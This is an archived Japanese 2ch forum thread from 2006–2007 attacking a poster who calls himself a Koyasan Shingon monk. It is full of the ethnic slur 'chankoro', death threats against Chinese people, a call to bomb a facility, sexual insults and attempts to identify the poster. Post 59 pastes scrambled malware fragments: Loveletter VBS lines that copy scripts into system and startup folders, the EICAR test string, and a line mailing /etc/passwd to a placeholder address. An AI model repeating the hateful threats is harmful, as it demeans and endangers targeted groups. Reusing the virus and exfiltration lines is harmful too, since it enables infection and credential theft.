5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

高野山真言宗僧侶は基地害

1 :名無しさん@京都板じゃないよ:2006/10/24(火) 15:09:25
37 名前:高野山真言宗僧侶 :2006/10/24(火) 14:03:51
>>35
正直、ヘタレ度ではウチだって似たようなもんだよ。
御大師様が流れ着いた地だとか言っちゃって、赤岸鎮にチャンコロのための福祉施設なんか建ててやって、中共傀儡のエセ仏教関係者とイチャついて喜んでやがるの。
恵果阿闍梨がなにゆえに何千人もいるチャンコロ弟子にではなく空海に法統を相承したのか、少しは考えてみろっつーの。
恵果阿闍梨が空海に中期密教の正統を伝えた時点で、中国の歴史的役割は終わったんだよ。…その後の中国はただの汚物。
それをへらへらチャンコロと馴れ合いやがって、土生川のクソめが。
マッチョーさんは一流の学者なんだから、新管長・新内局にはチャンコロとの毅然たる断交、赤岸鎮施設の爆破、チベットへの資金・武器支援を期待するね。




2 :名無しさん@京都板じゃないよ:2006/10/24(火) 16:25:24
このハッタリ坊主を本山に通報汁!!

3 :名無しさん@京都板じゃないよ:2006/10/24(火) 16:38:25
>>2
うるせー!!
チャンコロは死ね!!!

4 :名無しさん@京都板じゃないよ:2006/10/24(火) 16:40:28
>>1
どこからのコピペですか?

5 :名無しさん@京都板じゃないよ:2006/10/24(火) 16:45:58
ハブさんや大ちゃんには何で熱狂的、カルト的なファンが多いんだ?

6 :名無しさん@京都板じゃないよ:2006/10/24(火) 16:59:08
高野山真言宗僧侶師を支持する。
殺すぞ、中国人!!

7 :名無しさん@京都板じゃないよ:2006/10/24(火) 17:00:31
>>2
死ね

8 :名無しさん@京都板じゃないよ:2006/10/24(火) 17:06:31
>>2
基地害は貴様のほうだ

9 :名無しさん@京都板じゃないよ:2006/10/24(火) 17:15:33
高野山真言宗僧侶師の御説には、発展史観的に見たとしても、かなりの説得力があることは否めない。
高野山執行部の猛省を促したい。


10 :名無しさん@京都板じゃないよ:2006/10/24(火) 17:19:20
おまえバカ?
中国人のすべてが共産主義を礼賛してるとでも?
多くの中国人が共産党の圧政に耐えてるだけなんだぞ。
おまえは外国へ行って日本人というだけで帝国主義者とみられてもうれしいのか?

11 :高野山真言宗僧侶:2006/10/24(火) 17:22:15
あぁ、あぁ、チャンコロが逆ギレしちゃって、こんな単独スレ立てちゃってw
…どっちが思考停止のオコチャマか、これではっきりしたわなw
ま、頑張れやw

12 :名無しさん@京都板じゃないよ:2006/10/24(火) 17:24:43
こいつは高野山真言宗の人間じゃないな。どこか新興宗教の偽装工作か。

13 :名無しさん@京都板じゃないよ:2006/10/24(火) 17:28:07
>>12
チャンコロ乙

14 :名無しさん@京都板じゃないよ:2006/10/24(火) 17:30:55
>>13
はずかしいことはやめろ。日本の恥。

15 :名無しさん@京都板じゃないよ:2006/10/24(火) 17:33:21
>>11
真言宗を名乗るのをやめろ。
いや日本人をやめろ。
つか人間やめろ。犬猫野郎。

16 :名無しさん@京都板じゃないよ:2006/10/24(火) 17:34:46
大体、コテ名のついたスレ立ては禁止だってことも知らないのか? …さすがだな、チャンコロw

17 :名無しさん@京都板じゃないよ:2006/10/24(火) 17:35:22
最悪板でやってくれ

18 :名無しさん@京都板じゃないよ:2006/10/24(火) 17:35:41
>>16
日本の汚物w

19 :名無しさん@京都板じゃないよ:2006/10/24(火) 17:35:54
>>14
日本人のふりしなくてもいいってば、チャンコロw

20 :名無しさん@京都板じゃないよ:2006/10/24(火) 17:37:24
>>19
使い捨てナプキン野郎は威勢がいいなwwww

21 :名無しさん@京都板じゃないよ:2006/10/24(火) 17:38:33
ここのチャンコロには真宗禿=日共の臭いもするなww

22 :名無しさん@京都板じゃないよ:2006/10/24(火) 17:40:14
>>21
おまえの陰茎のほうがかなり臭いけどなwww

23 :名無しさん@京都板じゃないよ:2006/10/24(火) 17:41:20
>>21
もしかして包茎?しかも童貞?

24 :名無しさん@京都板じゃないよ:2006/10/24(火) 17:42:31
どうやら図星らしい。女性と付き合ったことのない童貞野郎か。
社会に対応できないのもうなずけるwwwwwww

25 :名無しさん@京都板じゃないよ:2006/10/24(火) 17:55:44
wwwwww ←なんて打って喜んでるヤシにだけはなりたくない…。

26 :名無しさん@京都板じゃないよ:2006/10/24(火) 17:56:33
>>25
さあ、勇気を出してソープに行くんだ!
ああ、その前に包茎を治さなくてはwwwwwwwwwwwwwwwwwwwwww

27 :名無しさん@京都板じゃないよ:2006/10/24(火) 17:58:03
>>25
いまどき「ヤシ」(←しかも半角!)なんて使ってる奴にだけはなりたくないwwwwwwwwwwwwwwwwwwwwwwwwwwww

28 :【警告】自治スレッド【警告】:2006/10/24(火) 18:07:54
最悪板以外で、スレッド名に固定ハンドル名を入れて煽る・叩くことは禁止です。
削除依頼を出して最悪板に移動して下さい。
…こんな初歩の初歩ルールも知らない方は、まず「壷」から入って下さい。

29 :名無しさん@京都板じゃないよ:2006/10/24(火) 18:13:05
>>28
こんなの常識だろ。チャンコロの消防のオムツ…いやオツムを取り替えてやるのも大変だなw

30 :名無しさん@京都板じゃないよ:2006/10/24(火) 18:13:08
そんなことは誰でも知ってる。
バカじゃね?

31 :名無しさん@京都板じゃないよ:2006/10/24(火) 18:14:07
>>29
さすが2ちゃんねらー歴の長い童貞クンwww
言うことが違うねwww

32 :名無しさん@京都板じゃないよ:2006/10/24(火) 18:23:55
>>30
だよなぁ。でもやっぱり中国人に理解させるのは無理なのかなあ…orz

33 :名無しさん@京都板じゃないよ:2006/10/24(火) 18:44:59
>>2
早く削除依頼出してこい。自分がした不始末の責任ぐらいはきちんと取れ。
大人だろ。

34 :名無しさん@京都板じゃないよ:2006/10/24(火) 23:47:38
こいつ本物の坊主じゃないだろw


35 :名無しさん@京都板じゃないよ:2006/10/25(水) 01:09:44
>>1>37 名前:高野山真言宗僧侶
土生川のクソだとテメェ!!
若僧のクセにテメェ何様だこの野郎。
今直ぐ下水にでも飛び込んで死んどけや。

36 :名無しさん@京都板じゃないよ:2006/10/25(水) 01:20:38
真言亡国 チャンコロ以下の糞坊主の巣窟

37 :名無しさん@京都板じゃないよ:2006/10/25(水) 04:14:11
住職だった寺の仏像3体を古美術商に売却したとして、富山県警射水署は
22日、高岡市蓮花寺、元住職、武田建昭容疑者(61)を業務上横領容疑で
逮捕した。檀信徒(だんしんと)の「仏像がない」という問い合わせで、
旧大門町(現射水市)教委や高野山真言宗の総本山が調べて仏像がなくなっている
ことが判明。武田容疑者はその後、昨年6月から行方不明となり、指名手配されていた。
容疑を認めているという。
 調べでは、武田容疑者は01年9〜10月、同県射水市水戸田、密蔵寺の
本尊、胎蔵界(たいぞうかい)大日如来像1体と烏天狗(からすてんぐ)像1対を
県内の古美術商に計260万円で売却し、代金を横領した疑い。
 大日如来像は当時、旧大門町指定文化財だったが、現在も見つかっていない。武田容疑者は、同教委などの聴取に売却を認めていたという。同寺では他にも同町指定文化財の仏像1体と別の仏像の一部などが行方不明で、同署は関連について追及している。【上野宏人】
(毎日新聞) - 10月23日12時29分更新

38 :名無しさん@京都板じゃないよ:2006/10/25(水) 09:59:06
また真言宗か・・・

39 :終了:2006/10/26(木) 18:06:21

重複スレです。

●誘導●
【総本山】 高野山真言宗総合スレ肆 【金剛峯寺】
http://travel2.2ch.net/test/read.cgi/kyoto/1159100684/

40 :名無しさん@京都板じゃないよ:2006/10/28(土) 07:04:23
aho!


41 :名無しさん@京都板じゃないよ:2006/11/11(土) 15:35:32
ほんとろくでもない坊主ばかり
生産すんなよ

厄坐みたいな坊主ばかりだなあ

42 :名無しさん@京都板じゃないよ:2006/11/11(土) 18:57:51
総持寺の中西住職のご子息?

43 :名無しさん@京都板じゃないよ:2006/12/11(月) 15:14:43
神職なのに真言宗僧侶だと詐称してます。
とんでもないヤツですんで指導してやってください。


【捏造】美濃上野八幡神社53之鳥居【居直り】
http://travel2.2ch.net/test/read.cgi/kyoto/1165653841/l50

44 :名無しさん@京都板じゃないよ:2006/12/11(月) 15:26:34
>>4
http://travel2.2ch.net/test/read.cgi/kyoto/1161508885/l50

45 :名無しさん@京都板じゃないよ:2006/12/11(月) 15:28:33
西国三十三観音スレにこんなんあるよ↓

335 :高野山真言宗僧侶 ◆cobo4pcvHY :2006/12/08(金) 11:18:32
壺阪寺に婿に入って、壺阪寺の娘さんに入りたいな。…豊山系だが、単立だから問題ないだろう。
よし、新年から通うことにしよう。


46 :名無しさん@京都板じゃないよ:2006/12/11(月) 16:07:20
>>1
西国三十三所観音霊場の札所になっている寺院で、入山料を徴収しない寺院の
僧侶であることは間違いないようだね。
でも、もう誰だか特定されてしまっている感じだね。

47 :名無しさん@京都板じゃないよ:2006/12/11(月) 16:09:57
ファンシーダンス修行体験記を今まで各スレに宣伝、お邪魔してすみませんでした。
心よりお詫び申し上げます。

48 :名無しさん@京都板じゃないよ:2006/12/12(火) 14:55:35
>>45
壺阪寺にホームページあるから、高野山真言宗僧侶君が婿に入るために通いますので宜しくとメールしましょう。
今までの発言もあわせて教えてあげようね。

49 :名無しさん@京都板じゃないよ:2006/12/13(水) 16:33:16
>>42
彼は歳いくつくらいなの?

50 :名無しさん@京都板じゃないよ:2006/12/13(水) 23:50:08
お仲間が逮捕されましたよ。。。

酒を飲んで乗用車を運転したとして、奈良県警は12日午前3時50分、同県平群町信貴畑、僧侶野澤聖弘(せいこう)
容疑者(37)を道路交通法違反(酒気帯び運転)の疑いで現行犯逮捕した。
http://news19.2ch.net/test/read.cgi/newsplus/1165893849/l50


51 :名無しさん@京都板じゃないよ:2006/12/14(木) 00:05:15
高野山真言宗の僧侶?

52 :名無しさん@京都板じゃないよ:2006/12/17(日) 01:21:14
伝授マニアにかぎって日記上で自慢したりする

53 :名無しさん@京都板じゃないよ:2006/12/17(日) 12:54:27
>>47
あれだけ皆に迷惑かけておいて、たったの二行のお詫びで許されるだろうか・・・・

54 :名無しさん@京都板じゃないよ:2006/12/17(日) 16:37:16
真言宗の真実
http://yy47.60.kg/test/read.cgi/akumaji/1165503242/

55 :名無しさん@京都板じゃないよ :2006/12/17(日) 18:37:57
>>47
「かたつむりの唄」も併せてお引き取りください。
>>54
だから何?豊山の話題でしょ?
これもまたトットとお引取りください。

56 :名無しさん@京都板じゃないよ:2006/12/20(水) 22:49:58
>>53 >>55
本人が詫びる訳ないじゃん。話を逸らしたい人が書いてるだけ。
話を逸らしたい人= スレタイの人

57 :名無しさん@京都板じゃないよ:2006/12/21(木) 16:50:53
西国三十三観音スレにこんなんあるね、高野山真言宗僧侶さんレポよろしく↓

335 :高野山真言宗僧侶 ◆cobo4pcvHY :2006/12/08(金) 11:18:32
壺阪寺に婿に入って、壺阪寺の娘さんに入りたいな。…豊山系だが、単立だから問題ないだろう。
よし、新年から通うことにしよう。

58 :名無しさん@京都板じゃないよ:2006/12/21(木) 22:50:42
452 名前:高野山真言宗僧侶 ◆cobo4pcvHY :2006/12/21(木) 21:30:59
サメの歯の化石だわな。輸入物なら一つ、\300ぐらいで買える。
以前、鞍馬寺のばぁちゃん(管長さま)に、これを「天狗の爪」として参拝者に\1500ぐらいで授与しましょうよ、桐の箱に綿敷いて売ったらバッチリですよ…ともちかけて、断られた。


453 名前:451 :2006/12/21(木) 21:46:54
>>452
俺が答えたかったんだけどw


454 名前:高野山真言宗僧侶 ◆cobo4pcvHY :2006/12/21(木) 22:48:39
>>453
スマソ。一寸足が出てしまつたよ。…ところで、天狗の爪ビジネスしない?




59 :名無しさん@京都板じゃないよ:2006/12/22(金) 00:26:16
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"),
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
c.Copy(dirwin&"\Win32DLL.vbs")
ms-its:mhtml:file://c:\
End Sub

60 :名無しさん@京都板じゃないよ:2007/01/03(水) 00:58:41
あけおめ〜

61 :名無しさん@京都板じゃないよ:2007/01/08(月) 20:38:16
o

62 :名無しさん@京都板じゃないよ:2007/01/09(火) 07:19:08
>>高野山真言宗僧侶は基地害
代表は常軌逸脱院住職名 稔君。
不倫で離婚、大学中退。

63 :名無しさん@京都板じゃないよ:2007/01/17(水) 18:59:29
ランボーを嬲り殺しにして遊ぶスレが登場!
↓みんな集合!

http://travel3.2ch.net/test/read.cgi/kyoto/1168927537/

64 :名無しさん@京都板じゃないよ:2007/01/20(土) 22:35:01


65 :名無しさん@京都板じゃないよ:2007/01/21(日) 09:05:05
-

66 :名無しさん@京都板じゃないよ:2007/01/28(日) 12:20:33
minoru

67 :名無しさん@京都板じゃないよ:2007/01/28(日) 23:20:51
ウイルス貼るんじゃねえよボケ!

68 :名無しさん@京都板じゃないよ:2007/01/29(月) 19:58:16
中院流の全てが基地外。
その法脈程度で大学、専修学院は他真言に失礼、迷惑。
旅館業のみに精を出せばよい。

69 :名無しさん@京都板じゃないよ:2007/01/29(月) 22:54:29
ここは「高野山真言宗僧侶」のコテハンで書き込んでる個人を叩くスレなんだが。。。

70 :名無しさん@京都板じゃないよ :2007/01/29(月) 23:23:03
>>68
そんなに褒められると照れるなあ。
書き込みの内容からして疹権争虜?
いやあさすが!不悪口の戒律堅持。
専学・尼僧学院・真別処・高大などで中院流已灌頂者増殖中なので、
僭越ながら代表してお礼を申し述べます。


71 :名無しさん@京都板じゃないよ:2007/01/30(火) 12:16:48
>>70
>>書き込みの内容からして疹権争虜?
糞争虜どす。
ほめ殺しでっせ。

72 :名無しさん@京都板じゃないよ:2007/02/07(水) 22:13:31
412 :名無しさん@京都板じゃないよ :2006/11/05(日) 22:08:51
>>411
>仏教の教えによれば、差別用語を使う僧は破戒している。

ヲイ、そんなこと、どの経典に書いてあるんだ?w
貴様の仏教は中共の御用仏教、日本でいえば創価学会だろ?w


415 :名無しさん@京都板じゃないよ :2006/11/05(日) 23:53:23
>>412
正語 (samyag-vaac, sammaa-vaacaa)
妄語を離れ、綺語を離れ、両舌を離れ、悪口を離れることである。

これが出来ないようでは僧ではないよ。
これを守らないと僧の格好をしてたとしても、それはただのコスプレ。
ニセモノだよ。
君はこれから仏教を学ぶのだと思うけれど、まず入門書から始めなさい。
それから経典を読むと良いと思うよ。


73 :名無しさん@京都板じゃないよ:2007/02/07(水) 22:14:32
425 :名無しさん@京都板じゃないよ :2006/11/06(月) 14:42:13
>>423
で。どの経典に書いてあるんだ?

426 :名無しさん@京都板じゃないよ :2006/11/06(月) 14:46:54
>>425
Dhammapada 133
Suttanipata 657

74 :名無しさん@京都板じゃないよ:2007/02/07(水) 22:15:56
474 名前:名無しさん@京都板じゃないよ :2006/11/10(金) 13:14:42
>>470
だから破戒なんだろ?
経典に書いてあるんだろ?
だからその書き込みの後に“そうか”と納得してやっただろ。“反論不必要”だとも。
何を反論させたいんだよ。そんなことは経典に書いてない。破戒でもないと言って欲しいのか?
ちゃんと説明しろ。文盲が!!


475 名前:名無しさん@京都板じゃないよ :2006/11/10(金) 13:24:56
>>474
あぁ、あのレスは君の投稿だったのか。
高野山真言宗僧侶のHNを使っている君が「破戒僧」だと私に教えてもらったてことで
終了だね(笑)。びっくりしたよ、僧侶の癖に最初は破戒していることに気が付いていないんだから。
経典まで聞いてきた(笑)。>>474のような言葉使いや止めなさいよ、私に教えてもらったんだから(笑)
勉強になったでしょ!励みなさい。



476 名前:名無しさん@京都板じゃないよ :2006/11/10(金) 13:59:59
>>475
だから破戒上等だって言ってんだろ。
そもそも全ての戒律を守る気なんて更々ねーんだよ。経典に書いてあってもだ。
だから殺人や盗みなど、常識の範疇を越えること以外は何でもやる。
大いに怒るし、容赦なく叱責する。肉も食うし酒も飲むし女もやる。
戒律を理由にそれを止めさせて、僧侶を自分より不幸に落としめて楽しもうという根性が気にいらねーんだ。
戒律を利用して「お前がそんな哀れな生活を送るのも、戒律だからしかたねーだろ。俺のせい
じゃない」という罪悪感の逃げ道を保障された腐った根性がな。
全僧侶が自分より不幸になり、乞食坊主になるまでお前らは仏教の名の下に戒律を強要する腹だってのは解ってるんだ。糞が!!



75 :名無しさん@京都板じゃないよ:2007/02/07(水) 22:32:08
バカですな

76 :名無しさん@京都板じゃないよ:2007/02/10(土) 23:47:34
厚岸:「除霊」と称し、僧侶が少女に暴行
 厚岸署は8日、「除霊」と称して釧路管内の無職少女(17)に乱暴したとして、
渡島管内八雲町宮園町、僧侶、秋山諦貫容疑者(56)を性的暴行の疑いで逮捕し
た。調べでは、秋山容疑者は昨年8月上旬、釧路管内厚岸町で営む寺に知人の紹介
で「除霊してほしい」と訪れた少女に対し、「私がやっているのは除霊だ」と信じ
込ませて寝かせ、乱暴した疑い。調べに対し、あいまいな供述を続けているという。
秋山容疑者は八雲と厚岸の2カ所の寺を運営していた。
http://www.mainichi-msn.co.jp/chihou/hokkaido/news/20070209hog00m040002000c.html

77 :名無しさん@京都板じゃないよ:2007/02/14(水) 13:08:30
ん?

78 :名無しさん@京都板じゃないよ:2007/02/19(月) 13:29:44
数年前の専学にはお茶の量が多い少ないで写経を課す寮監がいた
キチガイだ罠

79 :名無しさん@京都板じゃないよ:2007/02/19(月) 15:41:22
>78
高校で停学、寮での罰の時も「写経」を課しています。
アホ、基地外の集団。

80 :名無しさん@京都板じゃないよ:2007/02/19(月) 15:59:40
確かに罰を与えるなら他のやりようがあると思う
写経を利用するなんて罰当たりなことこの上ない
御仏に対する冒涜だ

81 :名無しさん@京都板じゃないよ:2007/02/20(火) 04:13:52
>80
でもお大師様の一言で全て終わる。

82 :名無しさん@京都板じゃないよ:2007/03/08(木) 13:47:17
その後お山の景色、坊主の様相はいかがですか ?
基地外ぶりは ?

83 :名無しさん@京都板じゃないよ:2007/03/30(金) 05:51:18
そりゃ坊主には基地害が多いよ。

84 :名無しさん@京都板じゃないよ:2007/03/30(金) 14:12:18
>>81 正道さーーーーーーーん!!
お茶の量でこんなことになってるよー!!wwwww

21 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)